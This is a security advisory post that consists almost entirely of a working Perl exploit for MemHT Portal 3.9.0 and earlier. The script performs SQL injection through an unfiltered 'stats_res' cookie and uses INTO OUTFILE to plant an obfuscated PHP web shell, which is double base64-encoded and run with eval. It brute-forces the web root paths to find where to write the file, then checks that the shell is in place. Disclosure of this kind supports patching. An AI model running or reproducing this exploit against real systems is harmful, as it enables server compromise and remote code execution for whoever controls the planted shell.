SecurityReason - MemHT Portal <= 3.9.0 Remote Create Shell Exploit

Advisory Text :

#!/usr/bin/perl
#
# MemHT Portal <= 3.9.0 Perl exploit
#
# discovered & written by Ams
# ax330d [doggy] gmail [dot] com
#
# DESCRIPTION:
# Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's,
# ($_COOKIE['stats_res']) which later goes to MySQL request. So we are able
to make
# sql injection.
# This exploit tries to create shell in /uploads/media/defined.php.
#
# NEEDED:
# magic_quotes_gpc = off
# MySQL should be able to write to file
# Know full server path to portal

use strict;
use warnings;
use IO::Socket;

print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MemHT portal <= 3.9.0 Perl exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
";

@ARGV or &usage ;
my $expl_url = shift;
$expl_url =~ m#http://# or &usage;
my $serv_path = shift || '-b';
my $def_shell = '/uploads/media/defined.php';

my $shell =
'\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMl
JwWlNod2FIQnBibVp2S0NrcE9q'
.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1S
nlrN2QyaHBiR1VvUmtGTVUwVWhQ'
.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSb
GNqMGtabXc5SnljN0pITnRQU2M4'
.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYU
W9KM05oWm1WZmJXOWtaU2NwTGlk'
.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV
3h6SnlrdUoxMG1ibUp6Y0R0YmJX'
.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY
0dNbktTNG5YU1p1WW5Od08xdGth'
.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1a
mRHbHZibk1uS1M0blhTWnVZbk53'
.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY
3VaMlYwWDJOMWNuSmxiblJmZFhO'
.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU
1p1WW5Od096d3ZaR2wyUGp4aWNp'
.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloW
kdWa1gyWnBiR1VvSkY5R1NVeEZV'
.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJac
GJHVW9KRjlHU1V4RlUxc25abWtu'
.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyM
HVQU2M4YzNCaGJpQmpiR0Z6Y3ow'
.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR
0Z1UGljN0NtbG1LQ0ZsYlhCMGVT'
.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiS
jJWMllXd25YU2s3SkhOdExqMXZZ'
.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwd
VBTYzhjSEpsUGljdVlDUmZVRTlU'
.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUO
GtabXc5YUdsbmFHeHBaMmgwWDJa'
.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQS
FJwZEd4bFBpNHVMblJ0Y0NCemFH'
.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZ
VhCbElpQmpiMjUwWlc1MFBTSjBa'
.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCM
GVYQmxQU0owWlhoMEwyTnpjeUkr'
.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXT
nJaM0p2ZFc1a0xXTnZiRzl5T2lN'
.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjR
zl6YVhScGIyNDZjbVZzWVhScGRt'
.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5Y
jNWdVpDMWpiMnh2Y2pvak16TXpP'
.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa
2RHZzZZWFYwYnp0OUNpNXVabTk3'
.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6W
TJOanR3WVdSa2FXNW5PalZ3ZUR0'
.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM
0k2SXpZMk5qdGliM0prWlhJNk1Y'
.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY
2kxamIyeHNZWEJ6WlRwamIyeHNZ'
.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4a
WIyUjVQaWN1SkdGc2JHWXVKend2'
.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtM
GdaVzVqZEhsd1pUMGliWFZzZEds'
.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDa
nh3UGp4cGJuQjFkQ0IwZVhCbFBT'
.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrU
EM5d1BqeDBZV0pzWlQ0S1BIUnlQ'
.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1a
GJXVTlJbVpwSWk4K1BDOTBaRDQ4'
.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHV
jRkQ0lnYm1GdFpUMGlaWGhsWXlJ'
.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQS
FJrUGp4cGJuQjFkQ0IwZVhCbFBT'
.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284Z
EhJK1BIUmtQblpwWlhjZ1ptbHNa'
.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaa
GJIVmxQU0lpUGladVluTndPeTlw'
.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0Nqe
HBibkIxZENCMGVYQmxQU0p6ZFdK'
.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQS
E53WVc0Z1kyeGhjM005SW1ocFpH'
.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1U
Gp3dmFIUnRiRDRuT3c9PQ==\%27'
.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B';

# You can add more :P
my @paths = qw(
/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting
/var/www/html /var/www/vhosts
/home/www home/httpd/vhosts
/usr/local/apache/htdocs
/www/htdocs
);

if($serv_path ne '-b') {
@paths = ($serv_path);
}

exploit($expl_url);

sub exploit {

# Defining vars.
my $url = pop @_;

print "\n\tExploiting $url\n";

my($host, $path, $packet, $rcvd);
$url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e;

# Trying to get /cron.php to get server path
$packet = "POST $path/cron.php HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
$rcvd = send_pckt($host, $packet, 1);

if( ! $rcvd) {
print "\n\tUnable to connect to http://$host\n\n";
exit;
}
if ($rcvd =~ /Undefined variable:/) {
$rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/;
@paths = ($1);
print "\n\tFound path!\n";
} else {
print "\n\tStarting bruteforce...\n";
}

# Some bruteforce here if path is not defined
foreach $serv_path (@paths) {

print ("\n\tTesting $serv_path$path$def_shell ...\n");
# Sending poisoned request
$packet = "POST $path/index.php HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into
outfile '$serv_path$path$def_shell'--\%20\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";

if( ! send_pckt($host, $packet)) {
print "\n\tUnable to connect to http://$host\n\n";
exit;
}
}

# Checking for shell presence
$packet = "POST $path$def_shell HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";

sleep(1);
$rcvd = send_pckt($host, $packet, 1);
if( ! $rcvd) {
print "\n\tUnable to connect to http://$host\n\n";
exit;
}

if ($rcvd =~ /tmp\s+shell/) {
print "\n\tExploited!\n\n";
} else {
print "\n\tExploiting failed.\n\n";
}

}

sub send_pckt() {

my $dat = 1;
my ($host, $packet, $ret) = @_;
my $socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$host,
PeerPort=>"80"
);
if( ! $socket) {
return 0;
} else {

print $socket $packet;
if($ret) {
my $rcv;
while($rcv = <$socket>) {
$dat .= $rcv;
}
}
close $socket;
return $dat;
}
}

sub usage {
print "\n\tUsage:\texpl.pl host [-b|full server path]

(by default exlpoit checks /cron.php file errors to get real path,
otherwise it will brute if failed, if used -b or none path is mentioned)

Example:\t$0 http://localhost/ /var/www/htdocs
$0 http://localhost/ -b
$0 http://localhost/\n\n";
exit;
}